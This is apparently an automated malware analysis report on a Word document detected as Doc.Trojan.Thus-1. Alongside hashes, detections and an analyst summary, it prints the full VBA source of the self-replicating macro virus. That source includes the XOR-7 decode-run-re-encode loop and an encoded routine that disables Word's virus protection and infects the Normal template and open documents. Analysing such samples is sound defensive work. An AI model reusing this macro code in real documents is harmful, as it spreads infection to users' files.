Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 df8e7bcf4d83d228…

MALICIOUS

Office (OLE)

31.0 KB Created: 2001-01-05 12:12:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: f2deecd78281cad2e59598a77d60cc66 SHA-1: 9f363c2be600d09dd568676bb2bfac495b64db70 SHA-256: df8e7bcf4d83d228c6e512668a0c0c52d82f82628896daececbc99fea5f966b6
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro in the ThisDocument module that runs from the Document_Open event (Document_Close calls the same routine, so the macro also fires on close). Document_Open XORs every character of module lines 60–87 with 7, which turns the commented-out body of Sub qqq into executable code, calls qqq, and then applies the same XOR to every copy whose line 60 no longer starts with an apostrophe, re-obfuscating it; the routine is therefore only in clear text for the duration of the call. Applying XOR 7 to those 28 preview lines yields a classic Normal-template infector rather than a downloader: it sets Application.Options.VirusProtection = False, replaces the NormalTemplate module with this one when the 'Alina_001' marker (module line 2) is missing, saves the template, and then copies the module into every other open document lacking the marker. The decoded routine contains no download, shell, or network code, so a "secondary payload" is not supported by what was recovered; it does require programmatic VBProject access, and where that is blocked the On Error Resume Next makes every step fail silently. The ClamAV detection Doc.Trojan.Thus-1 confirms the file is malicious; the 'Alina_001' marker and the closing 'Alina, ... I love you...' comment are the variant-specific strings to pivot on, and family attribution should be confirmed by decoding the carved macros.bas artifact (SHA-256 below) rather than this preview.

Heuristics 3

  • ClamAV: Doc.Trojan.Thus-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Thus-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13716 bytes
SHA-256: 844a11fd7dce0e14997cee8d8beab656456e02754adf0dcf77820ba570111a86
Detection
ClamAV: Doc.Trojan.Thus-1
Obfuscation or payload: unlikely — automated verdict, contradicted by the preview: module lines 60–87 are an XOR-7 encoded routine that Document_Open decodes in place, executes, and re-encodes.
Preview script
First 1,000 lines of the extracted script. Non-printable bytes in the encoded block are not rendered faithfully here — e.g. the 0x7F that XOR 7 produces from the letter "x" shows as a space in `Ib s` (decoded: `Next`) — so decode the carved macros.bas artifact, not this preview, when recovering the routine.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open() ' Auto-runs when the document opens; Document_Close below calls it again on close.
'Alina_001'
Dim s, a As Integer, n, ch ' Only a is Integer; s, n, ch are Variant. i and k are never declared (no Option Explicit in this module).
On Error Resume Next ' Every failure below is swallowed, e.g. denied VBProject access leaves the module untouched with no error shown.
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) = "'Alina_001'" Then ' Module line 2 is the marker comment directly above; a match means the Normal template already carries this module.
For i = 60 To 87 ' Module lines 60-87 are the commented-out body of Sub qqq further down.
    s = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1) ' Work on the Normal template's copy.
    For n = 1 To Len(s)
        ch = Mid(s, n, 1)
        a = Asc(ch)
        Mid(s, n, 1) = Chr(a Xor 7) ' XOR 7 is its own inverse: the same loop decodes comments into code and re-encodes code into comments.
    Next n
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines i ' Replace the line in place so line numbering is preserved.
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines i, s
Next i
Else ' Marker absent from Normal: transform this document's own module instead (unqualified VBProject = this document's project).
For i = 60 To 87
    s = VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
    For n = 1 To Len(s)
        ch = Mid(s, n, 1)
        a = Asc(ch)
        Mid(s, n, 1) = Chr(a Xor 7)
    Next n
    VBProject.VBComponents.Item(1).CodeModule.DeleteLines i
    VBProject.VBComponents.Item(1).CodeModule.InsertLines i, s
Next i
End If
qqq ' Run the routine just decoded. It does real work only when the Else branch rewrote this document's copy; otherwise this document's qqq body is still all comments. Relies on VBA picking up the edited lines before this call.
For k = 1 To Application.Documents.Count ' Re-obfuscation pass over every open document.
If Mid(Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(60, 1), 1, 1) <> "'" Then ' Line 60 not starting with an apostrophe means that copy is currently decoded.
   For i = 60 To 87
       s = Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
       For n = 1 To Len(s)
           ch = Mid(s, n, 1)
           a = Asc(ch)
           Mid(s, n, 1) = Chr(a Xor 7) ' Same XOR-7 loop: turns the decoded body back into comments.
       Next n
       Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.DeleteLines i
       Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.InsertLines i, s
   Next i
End If
Next k
If Mid(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(60, 1), 1, 1) <> "'" Then ' Same check and re-encode for the Normal template's copy.
   For i = 60 To 87
       s = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
       For n = 1 To Len(s)
           ch = Mid(s, n, 1)
           a = Asc(ch)
           Mid(s, n, 1) = Chr(a Xor 7)
       Next n
       NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines i
       NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines i, s
   Next i
End If
End Sub ' Net effect: qqq is in clear text only between the decode pass and the re-encode passes above.
Private Sub Document_Close() ' Closing the document re-runs the Document_Open routine (decode, infect, re-encode).
  Call Document_Open
End Sub
Private Sub qqq() ' Infection routine stored as XOR-7 encoded comments on module lines 60-87; Document_Open decodes these lines in place, calls qqq, then re-encodes them. Do not alter the lines below: they are read and rewritten at runtime and line 60 is checked for a leading apostrophe.
''''Hi'Buuhu'Ubtrjb'Ib s
''''Fwwkndfsnhi)Hwsnhit)QnurtWuhsbdsnhi':'Afktb
''''Na'IhujfkSbjwkfsb)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)Knibt/5+'6.';9'% FknifX776 %'Sobi
''''IhujfkSbjwkfsb)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb'X
'''')CbkbsbKnibt'6+'IhujfkSbjwkfsb)QEWuhmbds)QEDhjwhibist)Nsbj/6.'X
'''')DhcbJhcrkb)DhrisHaKnibt
''''Bic'Na
''''Na'IhujfkSbjwkfsb)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)DhrisHaKnibt':'7'Sobi
''''IhujfkSbjwkfsb)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb'X
'''')NitbusKnibt'6+'FdsnqbChdrjbis)QEWuhmbds)QEDhjwhibist)Nsbj/6.'X
'''')DhcbJhcrkb)Knibt/6+'FdsnqbChdrjbis)QEWuhmbds)QEDhjwhibist'X
'''')Nsbj/6.)DhcbJhcrkb)DhrisHaKnibt.
''''Bic'Na
''''Na'IhujfkSbjwkfsb)Tfqbc':'Afktb'Sobi'IhujfkSbjwkfsb)Tfqb
''''Ahu'l':'6'Sh'Fwwkndfsnhi)Chdrjbist)Dhris
''''Na'Fwwkndfsnhi)Chdrjbist)Nsbj/l.)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)Knibt/5+'6.';9'% FknifX776 %'Sobi
''''Fwwkndfsnhi)Chdrjbist)Nsbj/l.)QEWuhmbds)QEDhjwhibist)Nsbj/6.'X
'''')DhcbJhcrkb)CbkbsbKnibt'6+'Fwwkndfsnhi)Chdrjbist)Nsbj/l.'X
'''')QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)DhrisHaKnibt
''''Bic'Na
''''Na'Fwwkndfsnhi)Chdrjbist)Nsbj/l.)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)DhrisHaKnibt':'7'Sobi
''''Fwwkndfsnhi)Chdrjbist)Nsbj/l.)QEWuhmbds)QEDhjwhibist)Nsbj/6.'X
'''')DhcbJhcrkb)NitbusKnibt'6+'IhujfkSbjwkfsb)QEWuhmbds)QEDhjwhibist'X
'''')Nsbj/6.)DhcbJhcrkb)Knibt/6+'IhujfkSbjwkfsb)QEWuhmbds'X
'''')QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)DhrisHaKnibt.
''''Bic'Na
''''Ib s'l
'' Fknif+'~hr'f'ebfrsnarkbts'`nuk)'N'khqb'~hr)))
End Sub ' XOR 7 of the lines above reads, in order: On Error Resume Next; Application.Options.VirusProtection = False; if NormalTemplate module line 2 <> "'Alina_001'" delete all its lines; if it is then empty, insert all lines of ActiveDocument's module; save NormalTemplate if unsaved; for each open document lacking the marker, delete its module lines and insert NormalTemplate's; final line is the comment "Alina, you a beautifuless girl. I love you...". No download, shell or network calls appear in the decoded text. 0x7F bytes (XOR 7 of "x") are shown as spaces in this preview.




























' Processing file: /opt/analyzer/scan_staging/56e29660490f4cb691359c72583d4112.bin
' ==========
... (truncated)